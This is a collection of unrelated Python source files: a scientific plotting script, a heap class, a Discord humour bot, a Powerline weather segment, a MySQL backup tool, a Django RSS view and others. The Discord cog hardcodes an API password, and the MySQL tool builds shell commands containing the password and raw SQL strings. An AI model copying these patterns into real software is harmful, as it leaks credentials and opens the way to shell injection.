min_MAC_meas = mean_MAC_meas - np.min([row[4] for row in plot_data[mean_alt]])
max_MAC_meas = np.max([row[4] for row in plot_data[mean_alt]]) - mean_MAC_meas
mean_SSA_meas = np.mean([row[5] for row in plot_data[mean_alt]])
min_SSA_meas = mean_SSA_meas - np.min([row[5] for row in plot_data[mean_alt]])
max_SSA_meas = np.max([row[5] for row in plot_data[mean_alt]]) - mean_SSA_meas
mean_MAC_meas_bare = np.mean([row[6] for row in plot_data[mean_alt]])
min_MAC_meas_bare = mean_MAC_meas_bare - np.min([row[6] for row in plot_data[mean_alt]])
max_MAC_meas_bare = np.max([row[6] for row in plot_data[mean_alt]]) - mean_MAC_meas_bare
mean_SSA_meas_bare = np.mean([row[7] for row in plot_data[mean_alt]])
min_SSA_meas_bare = mean_SSA_meas_bare - np.min([row[7] for row in plot_data[mean_alt]])
max_SSA_meas_bare = np.max([row[7] for row in plot_data[mean_alt]]) - mean_SSA_meas_bare
mean_abse_meas = np.mean([row[8] for row in plot_data[mean_alt]])
mean_abse_calc = np.mean([row[9] for row in plot_data[mean_alt]])
plot_list.append([mean_alt,mean_MAC_calc,mean_SSA_calc,mean_MAC_calc_bare,mean_SSA_calc_bare,mean_MAC_meas,mean_SSA_meas,mean_MAC_meas_bare,mean_SSA_meas_bare,mean_abse_calc,mean_abse_meas])
plot_list.sort()
altitudes = [row[0] for row in plot_list]
MAC_calc_mean = [row[1] for row in plot_list]
SSA_calc_mean = [row[2] for row in plot_list]
MAC_calc_mean_bare = [row[3] for row in plot_list]
SSA_calc_mean_bare = [row[4] for row in plot_list]
MAC_meas_mean = [row[5] for row in plot_list]
SSA_meas_mean = [row[6] for row in plot_list]
MAC_meas_mean_bare = [row[7] for row in plot_list]
SSA_meas_mean_bare = [row[8] for row in plot_list]
mean_abse_calc = [row[9] for row in plot_list]
mean_abse_meas = [row[10] for row in plot_list]
fig = plt.figure(figsize=(10,10))
ax1 = plt.subplot2grid((2,2), (0,0), colspan=1)
ax2 = plt.subplot2grid((2,2), (0,1), colspan=1)
ax3 = plt.subplot2grid((2,2), (1,0), colspan=1)
ax1.plot(MAC_calc_mean,altitudes,marker='o',linestyle='-', color = 'b', label = 'coated rBC')
ax1.plot(MAC_calc_mean_bare,altitudes,marker='o',linestyle='--', color = 'b',alpha = 0.5, label = 'bare rBC')
ax1.set_ylabel('altitude (m)')
ax1.set_xlabel('MAC (m2/g)')
ax1.set_xlim(5,18)
ax1.set_ylim(0,5000)
handles, labels = ax1.get_legend_handles_labels()
ax1.legend(handles, labels,loc=7)
ax2.plot(SSA_calc_mean,altitudes,marker='o',linestyle='-', color = 'b')
ax2.plot(SSA_calc_mean_bare,altitudes,marker='o',linestyle='--', color = 'b',alpha = 0.5)
ax2.set_xlabel('SSA')
ax2.set_ylabel('altitude (m)')
ax2.set_xlim(0.38,0.5)
ax2.set_ylim(0,5000)
ax3.plot(mean_abse_calc,altitudes,marker='o',linestyle='-', color = 'b')
ax3.set_xlabel('absorption enhancement')
ax3.set_ylabel('altitude (m)')
ax3.set_xlim(1.3,1.7)
ax3.set_ylim(0,5000)
dir = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/'
os.chdir(dir)
if savefig == True:
plt.savefig('MAC SSA abs enhancement - Sc 1-7 full mass range.png', bbox_inches='tight')
plt.show()
|
from typing import Generic, TypeVar, Dict, Optional, Sized, Tuple
from typing import List
T = TypeVar("T")
InternalEntry = Tuple[float, int, T]
Entry = Tuple[T, float]
class BinaryHeap(Generic[T], Sized):
"""
Dvojiška kopica z najmanjšo vrednostjo na vrhu.
Kopica je predstavljena s seznamom,
v katerem je i-ti vnos manjši od vnosov z indeksoma 2*i+1 in 2*i+2.
Vsak vnos je trojica (vrednost, stevec, element),
kjer je števec določen z vrstnim redom vnašanja
in preprečuje primerjanje neprimerljivih elementov.
"""
    def __init__(self, slovar: Optional[Dict[T, float]] = None) -> None:
"""
Inicializacija kopice.
Elemente in vrednosti iz podanega slovarja organizira v kopico tako,
da izvede spuščanje vsakega elementa od zadnjega proti prvemu.
Časovna zahtevnost: O(n)
"""
if slovar is None or len(slovar) == 0:
self.seznam = [] # type: List[InternalEntry]
self.indeksi = {} # type: Dict[T, int]
else:
self.seznam = [(v, i, e) for i, (e, v)
in enumerate(slovar.items())]
self.indeksi = {x[2]: i for i, x in enumerate(self.seznam)}
for i in reversed(range(len(self.seznam) // 2)):
self.siftDown(i)
self.stevec = len(self.seznam)
def __len__(self) -> int:
"""
Velikost kopice.
Časovna zahtevnost: O(1)
"""
return len(self.seznam)
def __repr__(self) -> str:
"""
Znakovna predstavitev kopice.
Časovna zahtevnost: O(n)
"""
return '[%s]' % ', '.join("%s: %s" % (e, v) for v, s, e in self.seznam)
def __contains__(self, element: T) -> bool:
"""
Preveri, ali je element v kopici.
Časovna zahtevnost: O(1)
"""
return element in self.indeksi
def __getitem__(self, element: T) -> float:
"""
Vrne vrednost, ki je v kopici dodeljena elementu.
Časovna zahtevnost: O(1)
"""
return self.seznam[self.indeksi[element]][0]
def __setitem__(self, element: T, vrednost: float) -> None:
"""
Nastavi vrednost elementu v kopici.
Če element že obstaja, mu nastavi novo vrednost
ter glede na staro vrednost ustrezno popravi kopico.
Če element še ne obstaja,
ga doda na konec kopice ter ga dvigne do ustreznega mesta.
Časovna zahtevnost: O(log(n))
"""
if element in self.indeksi:
i = self.indeksi[element]
v, s, e = self.seznam[i]
self.replace(i, (vrednost, s, e))
else:
l = len(self.seznam)
self.indeksi[element] = l
self.seznam.append((vrednost, self.stevec, element))
self.stevec += 1
self.bubbleUp(l)
def __delitem__(self, element: T) -> None:
"""
        Remove an element from the heap.
        The last entry of the heap is removed and written over the deleted
        element, after which the heap is repaired according to the values.
        Time complexity: O(log(n))
"""
i = self.indeksi.pop(element)
vnos = self.seznam.pop()
if i < len(self.seznam):
self.replace(i, vnos)
def replace(self, i: int, vnos: InternalEntry) -> None:
"""
        Replace the entry at position i with a new entry.
        Depending on the values of the old and new entries, the latter is
        either sifted down or bubbled up to its proper place.
        Time complexity: O(log(i) + log(n/i))
"""
star = self.seznam[i]
self.seznam[i] = vnos
self.indeksi[vnos[2]] = i
if star < vnos:
self.siftDown(i)
else:
self.bubbleUp(i)
def peek(self) -> Entry:
"""
        Return the element at the top of the heap and its value.
        Time complexity: O(1)
"""
vrednost, stevec, element = self.seznam[0]
return (element, vrednost)
def pop(self) -> Entry:
"""
        Remove and return the element at the top of the heap and its value.
        Time complexity: O(log(n))
"""
vrednost, stevec, element = self.seznam[0]
del self[element]
return (element, vrednost)
def bubbleUp(self, i: int) -> None:
"""
        Bubble up the element at position i to its proper place.
        Time complexity: O(log(i))
"""
j = (i - 1) // 2
while i > 0 and self.seznam[j] > self.seznam[i]:
self.seznam[i], self.seznam[j] = self.seznam[j], self.seznam[i]
self.indeksi[self.seznam[i][2]] = i
self.indeksi[self.seznam[j][2]] = j
i = j
j = (i - 1) // 2
def siftDown(self, i: int) -> None:
"""
        Sift down the element at position i to its proper place.
        Time complexity: O(log(n/i))
"""
l = len(self.seznam)
j = 2 * i + 1
while j < l:
k = j + 1
if k < l and self.seznam[j] > self.seznam[k]:
j = k
if self.seznam[i] < self.seznam[j]:
return
self.seznam[i], self.seznam[j] = self.seznam[j], self.seznam[i]
self.indeksi[self.seznam[i][2]] = i
self.indeksi[self.seznam[j][2]] = j
i = j
j = 2 * i + 1
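# A minimal usage sketch (not part of the original module): build a heap
# from a dict, insert and update entries, and pop them in priority order.
if __name__ == "__main__":
    heap = BinaryHeap({"a": 3.0, "b": 1.0, "c": 2.0})
    heap["d"] = 0.5   # insert a new element
    heap["a"] = 0.1   # lower an existing value; the heap repairs itself
    while len(heap):
        print(heap.pop())  # ('a', 0.1), ('d', 0.5), ('b', 1.0), ('c', 2.0)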
|
import time
import callServer
POLL_FREQ_IN_S = 5
MIN_TIME_THRESHOLD = 1
WEIGHT_THRESHOLD_IN_G = 100
FEEDING_FREQ = 12
def getData():
    # Stub sensor read - replace with the real weight-sensor value
    return 0
def notify():
callServer.BoomerIsFed()
def run(debug=False):
    thresholdTime = 0
    while True:
        time.sleep(POLL_FREQ_IN_S)
        # Re-read the sensor on every poll; reading it once before the loop
        # meant the value never updated
        data = getData()
        if data > WEIGHT_THRESHOLD_IN_G:
            thresholdTime += 1
            if thresholdTime > MIN_TIME_THRESHOLD:
                notify()
                thresholdTime = 0
        else:
            if debug:
                print("continue")
run(True)
|
import asyncio
import discord
import random
import urllib
import requests
import json
import time
import os
from discord.ext import commands
from Cogs import Message
from Cogs import FuzzySearch
from Cogs import GetImage
from Cogs import Nullify
class Humor:
def __init__(self, bot, settings, listName = "Adjectives.txt"):
self.bot = bot
self.settings = settings
# Setup our adjective list
self.adj = []
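        # Unicode combining diacritical marks (U+0300-U+036E) used to build
        # the zalgo effect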
marks = map(chr, range(768, 879))
self.marks = list(marks)
if os.path.exists(listName):
with open(listName) as f:
for line in f:
self.adj.append(line)
@commands.command(pass_context=True)
async def zalgo(self, ctx, *, message = None):
"""Ỉ s̰hͨo̹u̳lͪd͆ r͈͍e͓̬a͓͜lͨ̈l̘̇y̡͟ h͚͆a̵͢v͐͑eͦ̓ i͋̍̕n̵̰ͤs͖̟̟t͔ͤ̉ǎ͓͐ḻ̪ͨl̦͒̂ḙ͕͉d͏̖̏ ṡ̢ͬö̹͗m̬͔̌e̵̤͕ a̸̫͓͗n̹ͥ̓͋t̴͍͊̍i̝̿̾̕v̪̈̈͜i̷̞̋̄r̦̅́͡u͓̎̀̿s̖̜̉͌..."""
        if message is None:
await ctx.send("Usage: `{}zalgo [message]`".format(ctx.prefix))
return
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
words = message.split()
try:
iterations = int(words[len(words)-1])
words = words[:-1]
except Exception:
iterations = 1
if iterations > 100:
iterations = 100
if iterations < 1:
iterations = 1
zalgo = " ".join(words)
for i in range(iterations):
if len(zalgo) > 2000:
break
zalgo = self._zalgo(zalgo)
zalgo = zalgo[:2000]
# Check for suppress
if suppress:
zalgo = Nullify.clean(zalgo)
await Message.say(self.bot, zalgo, ctx.message.channel, ctx.message.author, 1, 2000, 5)
#await ctx.send(zalgo)
    def _zalgo(self, text):
        # Append i//2 + 1 random combining marks to each alphanumeric
        # character of the i-th word, so later words get messier
        words = text.split()
        zalgo = ' '.join(''.join(c + ''.join(random.choice(self.marks)
                    for _ in range(i // 2 + 1)) * c.isalnum()
                    for c in word)
                    for i, word in enumerate(words))
        return zalgo
@commands.command(pass_context=True)
async def holy(self, ctx, *, subject : str = None):
"""Time to backup the Batman!"""
        if subject is None:
await ctx.channel.send("Usage: `{}holy [subject]`".format(ctx.prefix))
return
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
matchList = []
for a in self.adj:
if a[:1].lower() == subject[:1].lower():
matchList.append(a)
        if not len(matchList):
            # Nothing in there - fall back to a random entry
            # msg = "*Whoah there!* That was *too* holy for Robin!"
            matchList = self.adj
        word = random.choice(matchList).strip().capitalize()
        subject = subject.strip().capitalize()
        msg = "*Holy {} {}, Batman!*".format(word, subject)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def fart(self, ctx):
"""PrincessZoey :P"""
fartList = ["Poot", "Prrrrt", "Thhbbthbbbthhh", "Plllleerrrrffff", "Toot", "Blaaaaahnk", "Squerk"]
randnum = random.randint(0, len(fartList)-1)
msg = '{}'.format(fartList[randnum])
await ctx.channel.send(msg)
def canDisplay(self, server):
# Check if we can display images
lastTime = int(self.settings.getServerStat(server, "LastPicture"))
threshold = int(self.settings.getServerStat(server, "PictureThreshold"))
if not GetImage.canDisplay( lastTime, threshold ):
# await self.bot.send_message(channel, 'Too many images at once - please wait a few seconds.')
return False
        # If we made it here - update the LastPicture stat
self.settings.setServerStat(server, "LastPicture", int(time.time()))
return True
@commands.command(pass_context=True)
async def memetemps(self, ctx):
"""Get Meme Templates"""
url = "https://api.imgflip.com/get_memes"
r = requests.get(url)
result_json = json.loads(r.text)
templates = result_json["data"]["memes"]
templates_string_list = []
templates_string = "**Meme Templates**\n"
for template in templates:
            length_test = templates_string + "* [`{}` - `{}`]\n".format(template["id"], template["name"])
            if len(length_test) > 2000:
                # We're past our character limit - flush the current string
                # and start a new one with this template so it isn't dropped
                templates_string_list.append(templates_string)
                templates_string = "* [`{}` - `{}`]\n".format(template["id"], template["name"])
                continue
# Not over the limit - add it to the string
templates_string += "* [`{}` - `{}`]\n".format(template["id"], template["name"])
# Add the templates_string to the list here if it contains anything
if len(templates_string):
templates_string_list.append(templates_string)
# Iterate over all the template strings and display them
for string in templates_string_list:
await ctx.message.author.send(string)
# await Message.say(self.bot, templates_string, ctx.message.author)
@commands.command(pass_context=True)
async def meme(self, ctx, template_id = None, text_zero = None, text_one = None):
"""Generate Meme"""
if not self.canDisplay(ctx.message.guild):
return
        if text_one is None:
            # Set as space if not included
            text_one = " "
        if template_id is None or text_zero is None:
msg = "Usage: `{}meme [template_id] [text#1] [text#2]`\n\n Meme Templates can be found using `$memetemps`".format(ctx.prefix)
await ctx.channel.send(msg)
return
templates = self.getTemps()
chosenTemp = None
msg = ''
idMatch = FuzzySearch.search(template_id, templates, 'id', 1)
if idMatch[0]['Ratio'] < 1:
# Not a perfect match - try name
nameMatch = FuzzySearch.search(template_id, templates, 'name', 1)
if nameMatch[0]['Ratio'] > idMatch[0]['Ratio']:
# Better match on name than id
chosenTemp = nameMatch[0]['Item']['id']
if not nameMatch[0]['Ratio'] == 1:
# Still not a perfect match...
msg = 'I\'ll assume you meant *{}*.'.format(nameMatch[0]['Item']['name'])
        else:
            # ID is a perfect match
            chosenTemp = idMatch[0]['Item']['id']
        if chosenTemp is None:
            # Neither the id nor the name matched a known template
            await ctx.channel.send("No matching meme template found.")
            return
url = "https://api.imgflip.com/caption_image"
payload = {'template_id': chosenTemp, 'username':'CorpBot', 'password': 'pooter123', 'text0': text_zero, 'text1': text_one }
r = requests.post(url, data=payload)
result_json = json.loads(r.text)
result = result_json["data"]["url"]
if msg:
# result = '{}\n{}'.format(msg, result)
await ctx.channel.send(msg)
# Download Image - set title as a space so it disappears on upload
await GetImage.get(result, self.bot, ctx.message.channel, " ")
def getTemps(self):
url = "https://api.imgflip.com/get_memes"
r = requests.get(url)
result_json = json.loads(r.text)
templates = result_json["data"]["memes"]
if templates:
return templates
return None
|
from __future__ import (unicode_literals, division, absolute_import, print_function)
import json
from powerline.lib.url import urllib_read, urllib_urlencode
from powerline.lib.threaded import KwThreadedSegment
from powerline.segments import with_docstring
weather_conditions_codes = (
('tornado', 'stormy'), # 0
('tropical_storm', 'stormy'), # 1
('hurricane', 'stormy'), # 2
('severe_thunderstorms', 'stormy'), # 3
('thunderstorms', 'stormy'), # 4
('mixed_rain_and_snow', 'rainy' ), # 5
('mixed_rain_and_sleet', 'rainy' ), # 6
('mixed_snow_and_sleet', 'snowy' ), # 7
('freezing_drizzle', 'rainy' ), # 8
('drizzle', 'rainy' ), # 9
('freezing_rain', 'rainy' ), # 10
('showers', 'rainy' ), # 11
('showers', 'rainy' ), # 12
('snow_flurries', 'snowy' ), # 13
('light_snow_showers', 'snowy' ), # 14
('blowing_snow', 'snowy' ), # 15
('snow', 'snowy' ), # 16
('hail', 'snowy' ), # 17
('sleet', 'snowy' ), # 18
('dust', 'foggy' ), # 19
('fog', 'foggy' ), # 20
('haze', 'foggy' ), # 21
('smoky', 'foggy' ), # 22
('blustery', 'windy' ), # 23
('windy', ), # 24
('cold', 'day' ), # 25
('clouds', 'cloudy'), # 26
('mostly_cloudy_night', 'cloudy'), # 27
('mostly_cloudy_day', 'cloudy'), # 28
('partly_cloudy_night', 'cloudy'), # 29
('partly_cloudy_day', 'cloudy'), # 30
('clear_night', 'night' ), # 31
('sun', 'sunny' ), # 32
('fair_night', 'night' ), # 33
('fair_day', 'day' ), # 34
('mixed_rain_and_hail', 'rainy' ), # 35
('hot', 'sunny' ), # 36
('isolated_thunderstorms', 'stormy'), # 37
('scattered_thunderstorms', 'stormy'), # 38
('scattered_thunderstorms', 'stormy'), # 39
('scattered_showers', 'rainy' ), # 40
('heavy_snow', 'snowy' ), # 41
('scattered_snow_showers', 'snowy' ), # 42
('heavy_snow', 'snowy' ), # 43
('partly_cloudy', 'cloudy'), # 44
('thundershowers', 'rainy' ), # 45
('snow_showers', 'snowy' ), # 46
('isolated_thundershowers', 'rainy' ), # 47
)
weather_conditions_icons = {
'day': 'DAY',
'blustery': 'WIND',
'rainy': 'RAIN',
'cloudy': 'CLOUDS',
'snowy': 'SNOW',
'stormy': 'STORM',
'foggy': 'FOG',
'sunny': 'SUN',
'night': 'NIGHT',
'windy': 'WINDY',
'not_available': 'NA',
'unknown': 'UKN',
}
temp_conversions = {
'C': lambda temp: temp,
'F': lambda temp: (temp * 9 / 5) + 32,
'K': lambda temp: temp + 273.15,
}
temp_units = {
'C': '°C',
'F': '°F',
'K': 'K',
}
class WeatherSegment(KwThreadedSegment):
interval = 600
default_location = None
location_urls = {}
@staticmethod
def key(location_query=None, **kwargs):
return location_query
def get_request_url(self, location_query):
try:
return self.location_urls[location_query]
except KeyError:
if location_query is None:
location_data = json.loads(urllib_read('http://freegeoip.net/json/'))
location = ','.join((
location_data['city'],
location_data['region_name'],
location_data['country_code']
))
self.info('Location returned by freegeoip is {0}', location)
else:
location = location_query
query_data = {
'q':
'use "https://raw.githubusercontent.com/yql/yql-tables/master/weather/weather.bylocation.xml" as we;'
'select * from we where location="{0}" and unit="c"'.format(location).encode('utf-8'),
'format': 'json',
}
self.location_urls[location_query] = url = (
'http://query.yahooapis.com/v1/public/yql?' + urllib_urlencode(query_data))
return url
def compute_state(self, location_query):
url = self.get_request_url(location_query)
raw_response = urllib_read(url)
if not raw_response:
self.error('Failed to get response')
return None
response = json.loads(raw_response)
try:
condition = response['query']['results']['weather']['rss']['channel']['item']['condition']
condition_code = int(condition['code'])
temp = float(condition['temp'])
except (KeyError, ValueError):
self.exception('Yahoo returned malformed or unexpected response: {0}', repr(raw_response))
return None
try:
icon_names = weather_conditions_codes[condition_code]
except IndexError:
if condition_code == 3200:
icon_names = ('not_available',)
self.warn('Weather is not available for location {0}', self.location)
else:
icon_names = ('unknown',)
self.error('Unknown condition code: {0}', condition_code)
return (temp, icon_names)
def render_one(self, weather, icons=None, unit='C', temp_format=None, temp_coldest=-30, temp_hottest=40, **kwargs):
if not weather:
return None
temp, icon_names = weather
for icon_name in icon_names:
if icons:
if icon_name in icons:
icon = icons[icon_name]
break
else:
icon = weather_conditions_icons[icon_names[-1]]
temp_format = temp_format or ('{temp:.0f}' + temp_units[unit])
converted_temp = temp_conversions[unit](temp)
if temp <= temp_coldest:
gradient_level = 0
elif temp >= temp_hottest:
gradient_level = 100
else:
gradient_level = (temp - temp_coldest) * 100.0 / (temp_hottest - temp_coldest)
groups = ['weather_condition_' + icon_name for icon_name in icon_names] + ['weather_conditions', 'weather']
return [
{
'contents': icon + ' ',
'highlight_group': groups,
'divider_highlight_group': 'background:divider',
},
{
'contents': temp_format.format(temp=converted_temp),
'highlight_group': ['weather_temp_gradient', 'weather_temp', 'weather'],
'divider_highlight_group': 'background:divider',
'gradient_level': gradient_level,
},
]
weather = with_docstring(WeatherSegment(),
'''Return weather from Yahoo! Weather.
Uses GeoIP lookup from http://freegeoip.net/ to automatically determine
your current location; set ``location_query`` explicitly if you're using a
VPN or if your IP address is registered at another location.
Returns a list of colorized icon and temperature segments depending on
weather conditions.
:param str unit:
temperature unit, can be one of ``F``, ``C`` or ``K``
:param str location_query:
location query for your current location, e.g. ``oslo, norway``
:param dict icons:
dict for overriding default icons, e.g. ``{'heavy_snow' : u'❆'}``
:param str temp_format:
format string, receives ``temp`` as an argument. Should also hold unit.
:param float temp_coldest:
coldest temperature. Any temperature below it will have gradient level equal
to zero.
:param float temp_hottest:
hottest temperature. Any temperature above it will have gradient level equal
to 100. Temperatures between ``temp_coldest`` and ``temp_hottest`` receive
gradient level that indicates relative position in this interval
(``100 * (cur-coldest) / (hottest-coldest)``).
Divider highlight group used: ``background:divider``.
Highlight groups used: ``weather_conditions`` or ``weather``, ``weather_temp_gradient`` (gradient) or ``weather``.
Also uses ``weather_conditions_{condition}`` for all weather conditions supported by Yahoo.
''')
|
from __future__ import unicode_literals
from .logic_adapter import LogicAdapter
class NoKnowledgeAdapter(LogicAdapter):
"""
This is a system adapter that is automatically added
    to the list of logic adapters during initialization.
This adapter is placed at the beginning of the list
to be given the highest priority.
"""
def process(self, statement):
"""
If there are no known responses in the database,
then a confidence of 1 should be returned with
the input statement.
Otherwise, a confidence of 0 should be returned.
"""
if self.chatbot.storage.count():
return 0, statement
return 1, statement
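# A minimal sketch (hypothetical stubs, not part of ChatterBot) of how the
# adapter behaves: with an empty storage it returns full confidence and
# echoes the input statement. Assumes LogicAdapter needs no constructor args.
if __name__ == "__main__":
    class _FakeStorage(object):
        def count(self):
            return 0
    class _FakeBot(object):
        storage = _FakeStorage()
    adapter = NoKnowledgeAdapter()
    adapter.chatbot = _FakeBot()
    print(adapter.process("Hello"))  # -> (1, 'Hello')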
|
import sys
CS = [
"abcefg", "cf", "acdeg", "acdfg", "bcdf",
"abdfg", "abdefg", "acf", "abcdefg", "abcdfg",
]
LENS = set(len(x) for x in CS)
RCS = {l: [(i, x) for i, x in enumerate(CS) if len(x) == l] for l in LENS}
MCS = {k: i for i, k in enumerate(CS)}
def get(s):
l = list(s)
assert len(l) == 1, s
return l[0]
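# Deduction used by solve() (comments added for clarity): digits 1, 4, 7
# and 8 are identified by their unique segment counts. Segment 'a' is in 7
# but not 1; 4 minus 1 and 7 gives the {b, d} pair and 1 itself gives the
# {c, f} pair. Among the five-segment digits only 3 contains both of 1's
# segments, which pins down 'd', then 'b' and 'g'. The six-segment digit
# containing 3's segments plus 'd' is 9, whose complement is 'e'. Finally 5
# (the five-segment digit with 'b' and without 'e') separates 'f' from 'c'.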
def solve(codes, nums):
print(RCS)
mapping = {}
rmap = {}
for code in codes:
opts = RCS[len(code)]
if len(opts) == 1:
mapping[code] = opts[0]
rmap[opts[0][0]] = code
print(rmap)
la = get(list(set(rmap[7]) - set(rmap[1])))
bd = (set(rmap[4]) - (set(rmap[1])|set(rmap[7])))
cf = (set(rmap[1])&set(rmap[7])&set(rmap[4]))
# 2, 3, 5
fives = [set(x) for x in codes if len(x) == 5]
three = get([x for x in fives if cf.issubset(x)])
print("THREE", three)
ld = get(bd & three)
lb = get(set(rmap[4]) - {la, ld, *cf})
lg = get(three - {la, ld, *cf})
sixes = [set(x) for x in codes if len(x) == 6]
nine = get([x for x in sixes if (cf|{ld}).issubset(x)])
print("NINE", nine)
le = get(set("abcdefg") - nine)
# just c, f
five = get([x for x in fives if le not in x and lb in x])
lf = get((five & cf))
lc = get(cf - {lf})
m = {"a": la, "b": lb, "c": lc, "d": ld, "e": le, "f": lf, "g": lg}
lm = {v: k for k, v in m.items()}
print(lm)
snum = ""
for num in nums:
numk = "".join(sorted(lm[c] for c in num))
snum += str(MCS[numk])
rnum = int(snum)
print(rnum)
return rnum
# print(la, lb, ld, le, lg, cf)
def main(args):
# data = [x.split('\n') for x in sys.stdin.read().split('\n\n')]
# data = [int(s.strip()) for s in sys.stdin]
data = [s.strip() for s in sys.stdin]
data = [x.split(" | ") for x in data]
data = [(x.split(" "), y.split(" ")) for x, y in data]
# solve(*data[0])
print(sum(solve(*ent) for ent in data))
# print(RCS)
if __name__ == '__main__':
main(sys.argv)
|
import os
import logging
from rdb_backup.utility import run_shell
from rdb_backup.processor import DatabaseProcessor, TableProcessor
log = logging.getLogger(__name__)
class MysqlLocal(DatabaseProcessor):
processor_name = 'mysql'
tmp_dir = '/tmp/rdb_backup/mysql_local'
if not os.path.exists(tmp_dir):
run_shell('mkdir -p %s' % tmp_dir)
run_shell('chmod og-rwx %s' % tmp_dir)
def __init__(self, dbms, name, db_config, tb_config):
super().__init__(dbms, name, db_config, tb_config)
self.dump_sql = os.path.join(self.tmp_dir, '__%s__complete__.sql' % self.name)
self.password = db_config.pop('password')
self.username = db_config.pop('username')
self.extended_insert = db_config.get('extended-insert', True)
def run_mysql(self, sql):
command = 'mysql -u %s -p\'%s\' -e "%s"' % (self.username, self.password, sql)
return run_shell(command, cwd=self.tmp_dir)
def table_names(self):
process = self.run_mysql('use %s; show tables;' % self.name)
out = process.stdout.readlines()
tables = []
for item in out:
tables.append(item.strip().decode('utf8'))
return tables[1:]
@staticmethod
def write_schema_sql(schema_sql, line):
if line.startswith('-- Dump completed on'):
schema_sql.write('-- Dump completed') # clear date time info
else:
schema_sql.write(line)
def backup(self, need_backup_tables):
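        # Parse the mysqldump output with a small state machine:
        #   sign == 0 - outside a table block, waiting for CREATE TABLE
        #   sign == 1 - inside CREATE TABLE, collecting column names
        #   sign == 2 - past the definition, routing INSERT rows to the
        #               table's backup file until the next DROP TABLE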
dump_params = '-u %s -p\'%s\' --lock-all-tables --extended-insert=false' % (self.username, self.password)
run_shell('mysqldump %s %s > %s' % (dump_params, self.name, self.dump_sql), cwd=self.tmp_dir)
schema_sql = open(self.schema_sql, 'w')
sign = 0
table_sql = None
insert_str = None
insert_str_length = None
fields = []
for line in open(self.dump_sql):
if sign == 0:
if line.startswith('CREATE TABLE `'):
sign = 1
table_name = line[14:].split('`', 1)[0]
insert_str = 'INSERT INTO `%s` VALUES (' % table_name
insert_str_length = len(insert_str)
if table_name in need_backup_tables:
table_sql = need_backup_tables[table_name]
self.write_schema_sql(schema_sql, line)
elif sign == 1:
if line.startswith(' `'):
fields.append(line[3:].split('`', 1)[0])
else:
sign = 2
if table_sql:
table_sql.begin_backup(fields)
self.write_schema_sql(schema_sql, line)
elif sign == 2:
if line.startswith('DROP TABLE IF EXISTS '):
sign = 0
if table_sql:
table_sql.close()
table_sql = None
insert_str = None
insert_str_length = None
fields = []
self.write_schema_sql(schema_sql, line)
elif line.startswith(insert_str):
if table_sql:
table_sql.write_record(line[insert_str_length:-3])
else:
self.write_schema_sql(schema_sql, line)
        schema_sql.close()
        log.info('backup ' + self.schema_sql)
if not self.debug:
os.unlink(self.dump_sql)
def restore(self):
tables_ignored = []
import_sql = open(self.backup_path.replace('{table_name}', 'import'), 'w')
sign = 0
table_name = None
for line in open(self.schema_sql):
if sign == 0:
if line.startswith('LOCK TABLES `'):
sign += 1
table_name = line[13:-9]
import_sql.write(line)
continue
if sign == 1:
import_sql.write(line)
if self.ignored(table_name):
tables_ignored.append(table_name)
else:
table_file_path = self.backup_path.replace('{table_name}', table_name)
if os.path.exists(table_file_path) and os.stat(table_file_path).st_size > 0:
if self.extended_insert:
split = ' '
import_sql.write('INSERT INTO `%s` VALUES' % table_name)
memory_size = 0
for data_line in open(table_file_path):
if memory_size > 1048576: # 1024 * 1024
                                import_sql.write(';' + os.linesep)
import_sql.write('INSERT INTO `%s` VALUES' % table_name)
memory_size = 0
split = ' '
memory_size += len(data_line)
import_sql.write(split + '(' + data_line[:-1] + ')')
if split == ' ':
split = ','
                        import_sql.write(';' + os.linesep)
else:
insert_sql = 'INSERT INTO `%s` VALUES (%%s);%s' % (table_name, '\n')
for data_line in open(table_file_path):
import_sql.write(insert_sql % data_line[:-1])
sign = 0
table_name = None
continue
if tables_ignored:
log.info('ignored tables: %s' % tables_ignored)
log.info('generate import file: %s', import_sql.name)
import_sql.close()
class MysqlTable(TableProcessor):
processor_name = 'mysql'
def begin_backup(self, fields):
self.set_field_names(fields)
self.file = open(self.backup_path, 'w')
@classmethod
def get_record(cls, data):
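        # Split one row of a mysqldump INSERT statement into its field
        # strings, honouring single-quoted values and backslash escapes
        # ("in_wildcard" marks a pending escape character)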
field = None
in_mark = False
in_wildcard = False
fields = []
for _char in data:
if field is None:
if _char == '\'':
in_mark = True
field = ''
else:
in_mark = False
field = _char
else:
if in_mark:
if in_wildcard:
in_wildcard = False
else:
if _char == '\\':
in_wildcard = True
elif _char == '\'':
in_mark = False
else:
field += _char
else:
if _char == ',':
fields.append(field)
field = None
in_mark = False
else:
field += _char
fields.append(field)
return fields
def write_record(self, line):
if self.filter is None:
self.file.write(line + os.linesep)
else:
need_write = False
field_name, operator, filter_value = self.filter
record = self.get_record(line[:-len(os.linesep)])
field_value = self.get_field(record, field_name)
if operator == '>':
if field_value > filter_value:
need_write = True
if operator == '=':
if filter_value == 'None':
if field_value == 'NULL':
need_write = True
elif field_value == filter_value:
need_write = True
if operator == '!=':
if filter_value == 'None':
if field_value != 'NULL':
need_write = True
elif field_value != filter_value:
need_write = True
if operator == '<':
if field_value < filter_value or field_value == 'NULL': # or field_value is None
need_write = True
if need_write:
self.file.write(line + os.linesep)
|
from django.http import HttpResponse
from django.template import RequestContext, loader
from rss_feed.models import Feed
import feedparser
def index(request):
"""
index lists the feeds we are tracking
"""
feed_list = Feed.objects.all()
template = loader.get_template('index.html')
context = RequestContext(request, {
'feed_list': feed_list,
})
return HttpResponse(template.render(context))
def feed_results(request, feed):
"""
    feed_results returns the parsed results of the given feed
    """
    results = feedparser.parse(feed)
template = loader.get_template('feed_results.html')
context = RequestContext(request, {
'title' : results['feed']['title'],
'url' : results['feed']['link'],
'entries': results['entries']
})
return HttpResponse(template.render(context))
|
"""Test Automation config panel."""
from http import HTTPStatus
import json
from unittest.mock import patch
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import config
from homeassistant.helpers import entity_registry as er
from tests.components.blueprint.conftest import stub_blueprint_populate # noqa: F401
@pytest.fixture
async def setup_automation(
hass, automation_config, stub_blueprint_populate # noqa: F811
):
"""Set up automation integration."""
